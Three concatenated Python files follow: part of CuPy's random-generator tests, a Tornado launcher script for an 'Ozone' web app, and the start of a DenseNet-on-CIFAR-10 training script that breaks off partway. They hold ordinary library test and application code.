{'args': ([0., 0.], [[1., 0.], [0., 1.]]), 'size': 10, 'tol': 1e-6},
{'args': ([0., 0.], [[1., 0.], [0., 1.]]), 'size': (1, 2, 3), 'tol': 1e-6},
{'args': ([0., 0.], [[1., 0.], [0., 1.]]), 'size': 3, 'tol': 1e-6},
{'args': ([0., 0.], [[1., 0.], [0., 1.]]), 'size': (3, 3), 'tol': 1e-6},
{'args': ([0., 0.], [[1., 0.], [0., 1.]]), 'size': (), 'tol': 1e-6},
])
@testing.fix_random()
class TestMultivariateNormal(RandomGeneratorTestCase):
target_method = 'multivariate_normal'
def check_multivariate_normal(self, dtype):
vals = self.generate_many(
mean=self.args[0], cov=self.args[1], size=self.size, tol=self.tol,
dtype=dtype, _count=10)
shape = _get_size(self.size)
for val in vals:
assert isinstance(val, cupy.ndarray)
assert val.dtype == dtype
assert val.shape == shape + (2,)
def test_multivariate_normal_float32(self):
self.check_multivariate_normal(numpy.float32)
def test_multivariate_normal_float64(self):
self.check_multivariate_normal(numpy.float64)
# TODO(kataoka): add distribution test
@testing.parameterize(
{'n': 5, 'p': 0.5},
)
@testing.gpu
@testing.fix_random()
class TestNegativeBinomial(RandomGeneratorTestCase):
target_method = 'negative_binomial'
def test_negative_binomial(self):
self.generate(n=self.n, p=self.p, size=(3, 2))
# TODO(kataoka): add distribution test
@testing.parameterize(
{'df': 1.5, 'nonc': 2.0},
{'df': 2.0, 'nonc': 0.0},
)
@testing.gpu
@testing.fix_random()
class TestNoncentralChisquare(RandomGeneratorTestCase):
target_method = 'noncentral_chisquare'
def test_noncentral_chisquare(self):
self.generate(df=self.df, nonc=self.nonc, size=(3, 2))
@testing.for_dtypes('fd')
@_condition.repeat_with_success_at_least(10, 3)
def test_noncentral_chisquare_ks(self, dtype):
self.check_ks(0.05)(
self.df, self.nonc, size=2000, dtype=dtype)
@testing.parameterize(
{'dfnum': 2.0, 'dfden': 3.0, 'nonc': 4.0},
{'dfnum': 2.5, 'dfden': 1.5, 'nonc': 0.0},
)
@testing.gpu
@testing.fix_random()
class TestNoncentralF(RandomGeneratorTestCase):
target_method = 'noncentral_f'
def test_noncentral_f(self):
self.generate(
dfnum=self.dfnum, dfden=self.dfden, nonc=self.nonc, size=(3, 2))
@testing.for_dtypes('fd')
@_condition.repeat_with_success_at_least(10, 3)
def test_noncentral_f_ks(self, dtype):
self.check_ks(0.05)(
self.dfnum, self.dfden, self.nonc, size=2000, dtype=dtype)
@testing.gpu
@testing.parameterize(*[
{'args': (0.0, 1.0), 'size': None},
{'args': (10.0, 20.0), 'size': None},
{'args': (0.0, 1.0), 'size': 10},
{'args': (0.0, 1.0), 'size': (1, 2, 3)},
{'args': (0.0, 1.0), 'size': 3},
{'args': (0.0, 1.0), 'size': (3, 3)},
{'args': (0.0, 1.0), 'size': ()},
])
@testing.fix_random()
class TestNormal(RandomGeneratorTestCase):
target_method = 'normal'
def check_normal(self, dtype):
vals = self.generate_many(
self.args[0], self.args[1], self.size, dtype, _count=10)
shape = _get_size(self.size)
for val in vals:
assert isinstance(val, cupy.ndarray)
assert val.dtype == dtype
assert val.shape == shape
def test_normal_float32(self):
self.check_normal(numpy.float32)
def test_normal_float64(self):
self.check_normal(numpy.float64)
@testing.for_dtypes('fd')
@_condition.repeat_with_success_at_least(10, 3)
def test_normal_ks(self, dtype):
self.check_ks(0.05)(
*self.args, size=self.size, dtype=dtype)
@testing.parameterize(
{'a': 1.0},
{'a': 3.0},
{'a': 10.0},
)
@testing.gpu
@testing.fix_random()
class TestPareto(RandomGeneratorTestCase):
target_method = 'pareto'
def test_pareto(self):
self.generate(a=self.a, size=(3, 2))
@testing.for_dtypes('fd')
@_condition.repeat_with_success_at_least(10, 3)
def test_pareto_ks(self, dtype):
self.check_ks(0.05)(
a=self.a, size=2000, dtype=dtype)
@testing.parameterize(*common_distributions.poisson_params)
@testing.gpu
@testing.fix_random()
class TestPoisson(
common_distributions.Poisson,
RandomGeneratorTestCase
):
pass
@testing.parameterize(
{'df': 1.0},
{'df': 3.0},
{'df': 10.0},
)
@testing.gpu
@testing.fix_random()
class TestStandardT(RandomGeneratorTestCase):
target_method = 'standard_t'
def test_standard_t(self):
self.generate(df=self.df, size=(3, 2))
@testing.for_dtypes('fd')
@_condition.repeat_with_success_at_least(10, 3)
def test_standard_t_ks(self, dtype):
self.check_ks(0.05)(
df=self.df, size=2000, dtype=dtype)
@testing.gpu
@testing.parameterize(*[
{'size': None},
{'size': 10},
{'size': (1, 2, 3)},
{'size': 3},
{'size': ()},
])
@testing.fix_random()
class TestRandomSample(unittest.TestCase):
def setUp(self):
self.rs = _generator.RandomState(seed=testing.generate_seed())
def check_random_sample(self, dtype):
vals = [self.rs.random_sample(self.size, dtype) for _ in range(10)]
shape = _get_size(self.size)
for val in vals:
assert isinstance(val, cupy.ndarray)
assert val.dtype == dtype
assert val.shape == shape
assert (0 <= val).all()
assert (val < 1).all()
def test_random_sample_float32(self):
self.check_random_sample(numpy.float32)
def test_random_sample_float64(self):
self.check_random_sample(numpy.float64)
@testing.fix_random()
class TestRandomSampleDistrib(unittest.TestCase):
@testing.for_dtypes('fd')
@_condition.repeat_with_success_at_least(10, 3)
@numpy_cupy_equal_continuous_distribution(0.05)
def test_random_sample_ks(self, xp, dtype):
return _xp_random(xp, 'random_sample')(size=2000, dtype=dtype)
@testing.fix_random()
@testing.gpu
class TestRandAndRandN(unittest.TestCase):
def setUp(self):
self.rs = _generator.RandomState(seed=testing.generate_seed())
def test_rand_invalid_argument(self):
with self.assertRaises(TypeError):
self.rs.rand(1, 2, 3, unnecessary='unnecessary_argument')
def test_randn_invalid_argument(self):
with self.assertRaises(TypeError):
self.rs.randn(1, 2, 3, unnecessary='unnecessary_argument')
@testing.parameterize(
{'a': 0.5},
)
@testing.gpu
@testing.fix_random()
class TestPower(RandomGeneratorTestCase):
target_method = 'power'
def test_power(self):
self.generate(a=self.a, size=(3, 2))
@testing.for_dtypes('fd')
@_condition.repeat_with_success_at_least(10, 3)
def test_power_ks(self, dtype):
self.check_ks(0.05)(
a=self.a, size=2000, dtype=dtype)
@testing.parameterize(
{'scale': 1.0},
{'scale': 3.0},
)
@testing.gpu
@testing.fix_random()
class TestRayleigh(RandomGeneratorTestCase):
target_method = 'rayleigh'
def test_rayleigh(self):
self.generate(scale=self.scale, size=(3, 2))
@testing.for_dtypes('fd')
@_condition.repeat_with_success_at_least(10, 3)
def test_rayleigh_ks(self, dtype):
self.check_ks(0.05)(
scale=self.scale, size=2000, dtype=dtype)
@testing.gpu
@testing.fix_random()
class TestStandardCauchy(RandomGeneratorTestCase):
target_method = 'standard_cauchy'
def test_standard_cauchy(self):
self.generate(size=(3, 2))
@_attr.slow
@_condition.repeat(10)
def test_standard_cauchy_isfinite(self):
x = self.generate(size=10**7)
assert cupy.isfinite(x).all()
@testing.for_dtypes('fd')
@_condition.repeat_with_success_at_least(10, 3)
def test_standard_cauchy_ks(self, dtype):
self.check_ks(0.05)(
size=2000, dtype=dtype)
@testing.parameterize(*common_distributions.standard_gamma_params)
@testing.gpu
@testing.fix_random()
class TestStandardGamma(
common_distributions.StandardGamma,
RandomGeneratorTestCase
):
pass
@testing.fix_random()
@testing.gpu
class TestInterval(RandomGeneratorTestCase):
target_method = '_interval'
def test_zero(self):
shape = (2, 3)
vals = self.generate_many(0, shape, _count=10)
for val in vals:
assert isinstance(val, cupy.ndarray)
assert val.dtype.kind in 'iu'
assert val.shape == shape
assert (val == 0).all()
def test_shape_zero(self):
mx = 10
vals = self.generate_many(mx, None, _count=10)
for val in vals:
assert isinstance(val, cupy.ndarray)
assert val.dtype.kind in 'iu'
assert val.shape == ()
assert (0 <= val).all()
assert (val <= mx).all()
# TODO(niboshi): Distribution test
def test_shape_one_dim(self):
mx = 10
size = 20
vals = self.generate_many(mx, size, _count=10)
for val in vals:
assert isinstance(val, cupy.ndarray)
assert val.dtype.kind in 'iu'
assert val.shape == (size,)
assert (0 <= val).all()
assert (val <= mx).all()
# TODO(niboshi): Distribution test
def test_shape_multi_dim(self):
mx = 10
shape = (1, 2)
vals = self.generate_many(mx, shape, _count=10)
for val in vals:
assert isinstance(val, cupy.ndarray)
assert val.dtype.kind in 'iu'
assert val.shape == shape
assert (0 <= val).all()
assert (val <= mx).all()
# TODO(niboshi): Distribution test
def test_bound_1(self):
vals = self.generate_many(10, (2, 3), _count=10)
for val in vals:
assert isinstance(val, cupy.ndarray)
assert val.dtype.kind in 'iu'
assert val.shape == (2, 3)
assert (0 <= val).all()
assert (val <= 10).all()
def test_bound_2(self):
vals = self.generate_many(2, None, _count=20)
for val in vals:
assert isinstance(val, cupy.ndarray)
assert val.dtype.kind in 'iu'
assert val.shape == ()
assert (0 <= val).all()
assert (val <= 2).all()
@_condition.repeat(3, 10)
def test_goodness_of_fit(self):
mx = 5
trial = 300
vals = self.generate_many(mx, None, _count=trial)
vals = [val.get() for val in vals]
counts = numpy.histogram(vals, bins=numpy.arange(mx + 2))[0]
expected = numpy.array([float(trial) / (mx + 1)] * (mx + 1))
assert _hypothesis.chi_square_test(counts, expected)
@_condition.repeat(3)
def test_goodness_of_fit_2(self):
mx = 5
vals = self.generate(mx, (5, 5)).get()
counts = numpy.histogram(vals, bins=numpy.arange(mx + 2))[0]
expected = numpy.array([float(vals.size) / (mx + 1)] * (mx + 1))
assert _hypothesis.chi_square_test(counts, expected)
@testing.fix_random()
@testing.gpu
class TestTomaxint(RandomGeneratorTestCase):
target_method = 'tomaxint'
def test_tomaxint_none(self):
x = self.generate()
assert x.shape == ()
assert (0 <= x).all()
assert (x <= cupy.iinfo(cupy.int_).max).all()
def test_tomaxint_int(self):
x = self.generate(3)
assert x.shape == (3,)
assert (0 <= x).all()
assert (x <= cupy.iinfo(cupy.int_).max).all()
def test_tomaxint_tuple(self):
x = self.generate((2, 3))
assert x.shape == (2, 3)
assert (0 <= x).all()
assert (x <= cupy.iinfo(cupy.int_).max).all()
@testing.parameterize(
{'a': 3, 'size': 2, 'p': None},
{'a': 3, 'size': 2, 'p': [0.3, 0.3, 0.4]},
{'a': 3, 'size': (5, 5), 'p': [0.3, 0.3, 0.4]},
{'a': 3, 'size': (5, 5), 'p': numpy.array([0.3, 0.3, 0.4])},
{'a': 3, 'size': (), 'p': None},
{'a': numpy.array([0.0, 1.0, 2.0]), 'size': 2, 'p': [0.3, 0.3, 0.4]},
{'a': 0, 'size': 0, 'p': None},
{'a': numpy.array([]), 'size': 0, 'p': None},
)
@testing.fix_random()
@testing.gpu
class TestChoice1(RandomGeneratorTestCase):
target_method = 'choice'
def test_dtype_shape(self):
v = self.generate(a=self.a, size=self.size, p=self.p)
if isinstance(self.size, int):
expected_shape = (self.size,)
else:
expected_shape = self.size
if isinstance(self.a, numpy.ndarray):
expected_dtype = 'float'
else:
expected_dtype = 'int64'
assert v.dtype == expected_dtype
assert v.shape == expected_shape
@_condition.repeat(3, 10)
def test_bound(self):
vals = self.generate_many(
a=self.a, size=self.size, p=self.p, _count=20)
vals = [val.get() for val in vals]
size_ = self.size if isinstance(self.size, tuple) else (self.size,)
if size_ == (0, ):
self.skipTest('no bound check for empty `random.choice`')
for val in vals:
assert val.shape == size_
assert min(val.min() for val in vals) == 0
assert max(val.max() for val in vals) == 2
@testing.parameterize(
{'a': [0, 1, 2], 'size': 2, 'p': [0.3, 0.3, 0.4]},
)
@testing.fix_random()
@testing.gpu
class TestChoice2(RandomGeneratorTestCase):
target_method = 'choice'
def test_dtype_shape(self):
v = self.generate(a=self.a, size=self.size, p=self.p)
if isinstance(self.size, int):
expected_shape = (self.size,)
else:
expected_shape = self.size
if isinstance(self.a, numpy.ndarray):
expected_dtype = 'float'
else:
expected_dtype = 'int'
assert v.dtype == expected_dtype
assert v.shape == expected_shape
@_condition.repeat(3, 10)
def test_bound(self):
vals = self.generate_many(
a=self.a, size=self.size, p=self.p, _count=20)
vals = [val.get() for val in vals]
size_ = self.size if isinstance(self.size, tuple) else (self.size,)
for val in vals:
assert val.shape == size_
assert min(val.min() for val in vals) == 0
assert max(val.max() for val in vals) == 2
@testing.fix_random()
@testing.gpu
class TestChoiceChi(RandomGeneratorTestCase):
target_method = 'choice'
@_condition.repeat(3, 10)
def test_goodness_of_fit(self):
trial = 100
vals = self.generate_many(3, 1, True, [0.3, 0.3, 0.4], _count=trial)
vals = [val.get() for val in vals]
counts = numpy.histogram(vals, bins=numpy.arange(4))[0]
expected = numpy.array([30, 30, 40])
assert _hypothesis.chi_square_test(counts, expected)
@_condition.repeat(3, 10)
@pytest.mark.xfail(runtime.is_hip, reason='ROCm/HIP may have a bug')
def test_goodness_of_fit_2(self):
vals = self.generate(3, (5, 20), True, [0.3, 0.3, 0.4]).get()
counts = numpy.histogram(vals, bins=numpy.arange(4))[0]
expected = numpy.array([30, 30, 40])
assert _hypothesis.chi_square_test(counts, expected)
@testing.fix_random()
@testing.gpu
class TestChoiceMultinomial(unittest.TestCase):
@_condition.repeat(3, 10)
@testing.for_float_dtypes()
@testing.numpy_cupy_allclose(atol=0.02)
def test_choice_multinomial(self, xp, dtype):
p = xp.array([0.5, 0.25, 0.125, 0.125], dtype)
trial = 10000
x = xp.random.choice(len(p), trial, p=p)
y = xp.bincount(x).astype('f') / trial
return y
@testing.parameterize(
{'a': 3.1, 'size': 1, 'p': [0.1, 0.1, 0.8]},
{'a': None, 'size': 1, 'p': [0.1, 0.1, 0.8]},
{'a': -3, 'size': 1, 'p': [0.1, 0.1, 0.8]},
{'a': [[0, 1], [2, 3]], 'size': 1, 'p': [[0.1, 0.2], [0.3, 0.4]]},
{'a': [[0, 1], [2, 3]], 'size': 1, 'p': [0.3, 0.7]},
{'a': [], 'size': 1, 'p': [0.1, 0.1, 0.8]},
{'a': 4, 'size': 1, 'p': [[0.1, 0.2], [0.3, 0.4]]},
{'a': 2, 'size': 1, 'p': [0.1, 0.1, 0.8]},
{'a': 3, 'size': 1, 'p': [-0.1, 0.3, 0.8]},
{'a': 3, 'size': 1, 'p': [0.1, 0.1, 0.7]},
)
@testing.fix_random()
@testing.gpu
class TestChoiceFailure(unittest.TestCase):
def setUp(self):
self.rs = _generator.RandomState(seed=testing.generate_seed())
def test_choice_invalid_value(self):
with self.assertRaises(ValueError):
self.rs.choice(a=self.a, size=self.size, p=self.p)
@testing.parameterize(
{'a': 5, 'size': 2},
{'a': 5, 'size': (2, 2)},
{'a': 5, 'size': ()},
{'a': numpy.array([0.0, 2.0, 4.0]), 'size': 2},
)
@testing.fix_random()
@testing.gpu
class TestChoiceReplaceFalse(RandomGeneratorTestCase):
target_method = 'choice'
def test_dtype_shape(self):
v = self.generate(a=self.a, size=self.size, replace=False)
if isinstance(self.size, int):
expected_shape = (self.size,)
else:
expected_shape = self.size
if isinstance(self.a, numpy.ndarray):
expected_dtype = 'float'
else:
expected_dtype = 'int'
assert v.dtype == expected_dtype
assert v.shape == expected_shape
@_condition.repeat(3, 10)
def test_bound(self):
val = self.generate(a=self.a, size=self.size, replace=False).get()
size = self.size if isinstance(self.size, tuple) else (self.size,)
assert val.shape == size
assert (0 <= val).all()
assert (val < 5).all()
val = numpy.asarray(val)
assert numpy.unique(val).size == val.size
@testing.gpu
@testing.fix_random()
class TestGumbel(RandomGeneratorTestCase):
target_method = 'gumbel'
def test_gumbel_1(self):
self.generate()
def test_gumbel_2(self):
self.generate(0.0, 1.0, size=(3, 2))
@testing.for_dtypes('fd')
@_condition.repeat_with_success_at_least(10, 3)
def test_gumbel_ks_1(self, dtype):
self.check_ks(0.05)(
size=2000, dtype=dtype)
@testing.for_dtypes('fd')
@_condition.repeat_with_success_at_least(10, 3)
def test_gumbel_ks_2(self, dtype):
self.check_ks(0.05)(
2.3, 4.5, size=2000, dtype=dtype)
@testing.gpu
@testing.fix_random()
class TestRandint(RandomGeneratorTestCase):
# TODO(niboshi):
# Test soundness of distribution.
# Currently only reproducibility is checked.
target_method = 'randint'
def test_randint_1(self):
self.generate(3)
def test_randint_2(self):
self.generate(3, 4, size=(3, 2))
def test_randint_empty1(self):
self.generate(3, 10, size=0)
def test_randint_empty2(self):
self.generate(3, size=(4, 0, 5))
def test_randint_overflow(self):
self.generate(numpy.int8(-100), numpy.int8(100))
def test_randint_float1(self):
self.generate(-1.2, 3.4, 5)
def test_randint_float2(self):
self.generate(6.7, size=(2, 3))
def test_randint_int64_1(self):
self.generate(2**34, 2**40, 3, dtype='q')
@testing.gpu
@testing.fix_random()
class TestUniform(RandomGeneratorTestCase):
target_method = 'uniform'
def test_uniform_1(self):
self.generate()
def test_uniform_2(self):
self.generate(-4.2, 2.4, size=(3, 2))
@testing.for_dtypes('fd')
@_condition.repeat_with_success_at_least(10, 3)
def test_uniform_ks_1(self, dtype):
self.check_ks(0.05)(
size=2000, dtype=dtype)
@testing.for_dtypes('fd')
@_condition.repeat_with_success_at_least(10, 3)
def test_uniform_ks_2(self, dtype):
self.check_ks(0.05)(
-4.2, 2.4, size=2000, dtype=dtype)
@testing.parameterize(
{'mu': 0.0, 'kappa': 1.0},
{'mu': 3.0, 'kappa': 3.0},
{'mu': 3.0, 'kappa': 1.0},
)
@testing.gpu
@testing.fix_random()
class TestVonmises(RandomGeneratorTestCase):
target_method = 'vonmises'
def test_vonmises(self):
self.generate(mu=self.mu, kappa=self.kappa, size=(3, 2))
@testing.for_dtypes('fd')
@_condition.repeat_with_success_at_least(10, 3)
def test_vonmises_ks(self, dtype):
self.check_ks(0.05)(
self.mu, self.kappa, size=2000, dtype=dtype)
@testing.parameterize(
{'mean': 1.0, 'scale': 3.0},
{'mean': 3.0, 'scale': 3.0},
{'mean': 3.0, 'scale': 1.0},
)
@testing.gpu
@testing.fix_random()
class TestWald(RandomGeneratorTestCase):
target_method = 'wald'
def test_wald(self):
self.generate(mean=self.mean, scale=self.scale, size=(3, 2))
@testing.for_dtypes('fd')
@_condition.repeat_with_success_at_least(10, 3)
def test_wald_ks(self, dtype):
self.check_ks(0.05)(
self.mean, self.scale, size=2000, dtype=dtype)
@testing.parameterize(
{'a': 0.5},
{'a': 1.0},
{'a': 3.0},
{'a': numpy.inf},
)
@testing.gpu
@testing.fix_random()
class TestWeibull(RandomGeneratorTestCase):
target_method = 'weibull'
def test_weibull(self):
self.generate(a=self.a, size=(3, 2))
@testing.for_dtypes('fd')
@_condition.repeat_with_success_at_least(10, 3)
def test_weibull_ks(self, dtype):
self.check_ks(0.05)(
a=self.a, size=2000, dtype=dtype)
@testing.parameterize(
{'a': 2.0},
)
@testing.gpu
@testing.fix_random()
class TestZipf(RandomGeneratorTestCase):
target_method = 'zipf'
def test_zipf(self):
self.generate(a=self.a, size=(3, 2))
# TODO(kataoka): add distribution test
@testing.parameterize(
{'a': 3, 'size': 5},
{'a': [1, 2, 3], 'size': 5},
)
@testing.fix_random()
@testing.gpu
class TestChoiceReplaceFalseFailure(unittest.TestCase):
def test_choice_invalid_value(self):
for xp in (numpy, cupy):
rs = xp.random.RandomState(seed=testing.generate_seed())
with pytest.raises(ValueError):
rs.choice(a=self.a, size=self.size, replace=False)
class TestResetStates(unittest.TestCase):
def test_reset_states(self):
_generator._random_states = 'dummy'
_generator.reset_states()
assert {} == _generator._random_states
@testing.gpu
class TestGetRandomState(unittest.TestCase):
def setUp(self):
self.device_id = cuda.Device().id
self.rs_tmp = _generator._random_states
def tearDown(self, *args):
_generator._random_states = self.rs_tmp
def test_get_random_state_initialize(self):
_generator._random_states = {}
rs = _generator.get_random_state()
assert _generator._random_states[self.device_id] == rs
def test_get_random_state_memoized(self):
_generator._random_states = {self.device_id: 'expected',
self.device_id + 1: 'dummy'}
rs = _generator.get_random_state()
assert 'expected' == _generator._random_states[self.device_id]
assert 'dummy' == _generator._random_states[self.device_id + 1]
assert 'expected' == rs
@testing.gpu
class TestSetRandomState(unittest.TestCase):
def setUp(self):
self.rs_tmp = _generator._random_states
def tearDown(self, *args):
_generator._random_states = self.rs_tmp
def test_set_random_state(self):
rs = _generator.RandomState()
_generator.set_random_state(rs)
assert _generator.get_random_state() is rs
def test_set_random_state_call_multiple_times(self):
_generator.set_random_state(_generator.RandomState())
rs = _generator.RandomState()
_generator.set_random_state(rs)
assert _generator.get_random_state() is rs
@testing.gpu
@testing.fix_random()
class TestStandardExponential(
common_distributions.StandardExponential,
RandomGeneratorTestCase
):
pass
@testing.parameterize(
{'left': -1.0, 'mode': 0.0, 'right': 2.0},
)
@testing.gpu
@testing.fix_random()
class TestTriangular(RandomGeneratorTestCase):
target_method = 'triangular'
def test_triangular(self):
self.generate(
left=self.left, mode=self.mode, right=self.right, size=(3, 2))
@testing.gpu
class TestRandomStateThreadSafe(unittest.TestCase):
def setUp(self):
cupy.random.reset_states()
def test_get_random_state_thread_safe(self):
def _f(func, args=()):
cupy.cuda.Device().use()
func(*args)
seed = 10
threads = [
threading.Thread(
target=_f, args=(cupy.random.seed, (seed,))),
threading.Thread(
target=_f, args=(cupy.random.get_random_state,)),
threading.Thread(
target=_f, args=(cupy.random.get_random_state,)),
threading.Thread(
target=_f, args=(cupy.random.get_random_state,)),
threading.Thread(
target=_f, args=(cupy.random.get_random_state,)),
threading.Thread(
target=_f, args=(cupy.random.get_random_state,)),
threading.Thread(
target=_f, args=(cupy.random.get_random_state,)),
]
for t in threads:
t.start()
for t in threads:
t.join()
actual = cupy.random.uniform()
cupy.random.seed(seed)
expected = cupy.random.uniform()
assert actual == expected
def test_set_random_state_thread_safe(self):
def _f(func, args=()):
cupy.cuda.Device().use()
func(*args)
rs = cupy.random.RandomState()
threads = [
threading.Thread(
target=_f, args=(cupy.random.set_random_state, (rs,))),
threading.Thread(
target=_f, args=(cupy.random.set_random_state, (rs,))),
]
for t in threads:
t.start()
for t in threads:
t.join()
assert cupy.random.get_random_state() is rs
@testing.gpu
class TestGetRandomState2(unittest.TestCase):
def setUp(self):
self.rs_dict = _generator._random_states
_generator._random_states = {}
self.cupy_seed = os.getenv('CUPY_SEED')
def tearDown(self, *args):
_generator._random_states = self.rs_dict
if self.cupy_seed is None:
os.environ.pop('CUPY_SEED', None)
else:
os.environ['CUPY_SEED'] = self.cupy_seed
def test_get_random_state_no_cupy(self):
os.environ.pop('CUPY_SEED', None)
rvs0 = self._get_rvs_reset()
rvs1 = self._get_rvs_reset()
self._check_different(rvs0, rvs1)
def test_get_random_state_with_cupy(self):
rvs0 = self._get_rvs(_generator.RandomState(6))
os.environ['CUPY_SEED'] = '6'
rvs1 = self._get_rvs_reset()
self._check_same(rvs0, rvs1)
def _get_rvs(self, rs):
rvu = rs.rand(4)
rvn = rs.randn(4)
return rvu, rvn
def _get_rvs_reset(self):
_generator.reset_states()
return self._get_rvs(_generator.get_random_state())
def _check_same(self, rvs0, rvs1):
for rv0, rv1 in zip(rvs0, rvs1):
testing.assert_array_equal(rv0, rv1)
def _check_different(self, rvs0, rvs1):
for rv0, rv1 in zip(rvs0, rvs1):
for r0, r1 in zip(rv0, rv1):
assert r0 != r1
class TestCheckAndGetDtype(unittest.TestCase):
@testing.for_float_dtypes(no_float16=True)
def test_float32_64_type(self, dtype):
assert _generator._check_and_get_dtype(dtype) == numpy.dtype(dtype)
def test_float16(self):
with self.assertRaises(TypeError):
_generator._check_and_get_dtype(numpy.float16)
@testing.for_int_dtypes()
def test_int_type(self, dtype):
with self.assertRaises(TypeError):
_generator._check_and_get_dtype(dtype)
|
webserver.py
|
from ozone import create_app
from ozone.config import ProdConfigLinux, DevConfigLinux, ProdConfigWindows, DevConfigWindows, logger
from tornado.wsgi import WSGIContainer
from tornado.httpserver import HTTPServer
from tornado.ioloop import IOLoop
from ozone.utils.music_util import query_loop
import threading
import argparse
import platform
def songs_rank_thread(config):
'''
Songs rank thread
'''
query_loop(config)
def webserver_thread(app):
'''
Ozone app server thread
'''
http_server = HTTPServer(WSGIContainer(app))
http_server.listen(5000)
IOLoop.instance().start()
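# Illustrative launch commands (the --debug flag is defined below in __main__;
# adjust to your environment):
#
#   python webserver.py            # production config
#   python webserver.py --debug    # development config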
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Ozone app parser')
parser.add_argument("--debug", action="store_true", help="Launch in debug mode")
args = parser.parse_args()
    # Determine the platform
platform_info = platform.platform()
if "Windows" in platform_info:
if args.debug:
app = create_app(DevConfigWindows)
# song_thread = threading.Thread(target=songs_rank_thread, args=(DevConfigWindows,))
else:
app = create_app(ProdConfigWindows)
# song_thread = threading.Thread(target=songs_rank_thread, args=(ProdConfigWindows,))
elif "Linux" in platform_info:
if args.debug:
app = create_app(DevConfigLinux)
song_thread = threading.Thread(target=songs_rank_thread, args=(DevConfigLinux,))
song_thread.start()
else:
app = create_app(ProdConfigLinux)
song_thread = threading.Thread(target=songs_rank_thread, args=(ProdConfigLinux,))
song_thread.start()
else:
logger.warning("Unrecognized platform, assuming it works fine with linux platform")
if args.debug:
app = create_app(DevConfigLinux)
song_thread = threading.Thread(target=songs_rank_thread, args=(DevConfigLinux,))
song_thread.start()
else:
app = create_app(ProdConfigLinux)
song_thread = threading.Thread(target=songs_rank_thread, args=(ProdConfigLinux,))
song_thread.start()
# song_thread.start()
if app.config['DEBUG']:
logger.info("Launch in debug mode")
app.run(debug=True)
else:
logger.info("Launch in normal mode")
webserver_thread(app)
|
train_test.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Trains and tests a DenseNet on CIFAR-10.
For usage information, call with --help.
Author: Jan Schlüter
"""
import os
from argparse import ArgumentParser
def opts_parser():
usage = "Trains and tests a DenseNet on CIFAR-10."
parser = ArgumentParser(description=usage)
parser.add_argument(
'-L', '--depth', type=int, default=40,
help='Network depth in layers (default: %(default)s)')
parser.add_argument(
'-k', '--growth-rate', type=int, default=12,
help='Growth rate in dense blocks (default: %(default)s)')
parser.add_argument(
'--dropout', type=float, default=0,
help='Dropout rate (default: %(default)s)')
parser.add_argument(
'--augment', action='store_true', default=True,
help='Perform data augmentation (enabled by default)')
parser.add_argument(
'--no-augment', action='store_false', dest='augment',
help='Disable data augmentation')
parser.add_argument(
'--validate', action='store_true', default=False,
help='Perform validation on validation set (disabled by default)')
parser.add_argument(
'--no-validate', action='store_false', dest='validate',
help='Disable validation')
parser.add_argument(
'--validate-test', action='store_const', dest='validate',
const='test', help='Perform validation on test set')
parser.add_argument(
'--epochs', type=int, default=300,
help='Number of training epochs (default: %(default)s)')
parser.add_argument(
'--eta', type=float, default=0.1,
help='Initial learning rate (default: %(default)s)')
parser.add_argument(
'--save-weights', type=str, default=None, metavar='FILE',
help='If given, save network weights to given .npz file')
parser.add_argument(
'--save-errors', type=str, default=None, metavar='FILE',
help='If given, save train/validation errors to given .npz file')
return parser
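# Example invocation (illustrative only; every flag shown is defined in
# opts_parser() above, the output filename is a placeholder):
#
#   python train_test.py -L 40 -k 12 --validate --save-weights densenet.npz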
def generate_in_background(generator, num_cached=10):
"""
Runs a generator in a background thread, caching up to `num_cached` items.
"""
    try:
        import queue as queue_module  # Python 3
    except ImportError:
        import Queue as queue_module  # Python 2 fallback
    queue = queue_module.Queue(maxsize=num_cached)
sentinel = object() # guaranteed unique reference
# define producer (putting items into queue)
def producer():
for item in generator:
queue.put(item)
queue.put(sentinel)
# start producer (in a background thread)
import threading
thread = threading.Thread(target=producer)
thread.daemon = True
thread.start()
# run as consumer (read items from queue, in current thread)
item = queue.get()
while item is not sentinel:
yield item
item = queue.get()
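# Minimal usage sketch for the helper above (illustrative only; `slow_source`
# is a made-up generator, not part of this script):
#
#   >>> def slow_source():
#   ...     for i in range(3):
#   ...         yield i
#   >>> list(generate_in_background(slow_source(), num_cached=2))
#   [0, 1, 2]
#
# The producer runs in a daemon thread, so slow work such as data augmentation
# can overlap with training on the consumer side.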
def train_test(depth, growth_rate, dropout, augment, validate, epochs,
eta, save_weights, save_errors, batchsize=64):
# import (deferred until now to make --help faster)
import numpy as np
import theano
import theano.tensor as T
import lasagne
import densenet_fast as densenet # or "import densenet" for slower version
import cifar10
import progress
# instantiate network
print("Instantiating network...")
input_var = T.tensor4('inputs')
target_var = T.ivector('targets')
network = densenet.build_densenet(input_var=input_var, depth=depth,
growth_rate=growth_rate, dropout=dropout)
print("%d layers with weights, %d parameters" %
(sum(hasattr(l, 'W')
for l in lasagne.layers.get_all_layers(network)),
lasagne.layers.count_params(network, trainable=True)))
# load dataset
print("Loading dataset...")
X_train, y_train, X_test, y_test = cifar10.load_dataset(
path=os.path.join(os.path.dirname(__file__), 'data'))
if validate == 'test':
X_val, y_val = X_test, y_test
elif validate:
X_val, y_val = X_train[-5000:], y_train[-5000:]
X_train, y_train = X_train[:-5000], y_train[:-5000]
# define training function
print("Compiling training function...")
prediction = lasagne.layers.get_output(network)
# note: The Keras implementation clips predictions for the categorical
# cross-entropy. This doesn't seem to have a positive effect here.
# prediction = T.clip(prediction, 1e-7, 1 - 1e-7)
loss = lasagne.objectives.categorical_crossentropy(prediction,
target_var).mean()
# note: The paper says 1e-4 decay, but 1e-4 in Torch is 5e-5 elsewhere.
# However, 1e-4 seems to work better than 5e-5, so we use 1e-4.
# note: Torch includes biases in L2 decay. This seems to be important! So
# we decay all 'trainable' parameters, not just 'regularizable' ones.
l2_loss = 1e-4 * lasagne.regularization.regularize_network_params(
network, lasagne.regularization.l2, {'trainable': True})
params = lasagne.layers.get_all_params(network, trainable=True)
eta = theano.shared(lasagne.utils.floatX(eta), name='eta')
updates = lasagne.updates.nesterov_momentum(
loss + l2_loss, params, learning_rate=eta, momentum=0.9)
train_fn = theano.function([input_var, target_var], loss, updates=updates)
l2_fn = theano.function([], l2_loss)
# define validation/testing function
print("Compiling testing function...")
test_prediction = lasagne.layers.get_output(network, deterministic=True)
test_loss = lasagne.objectives.categorical_crossentropy(test_prediction,
target_var).mean()
test_err = 1 - lasagne.objectives.categorical_accuracy(test_prediction,
target_var).mean()
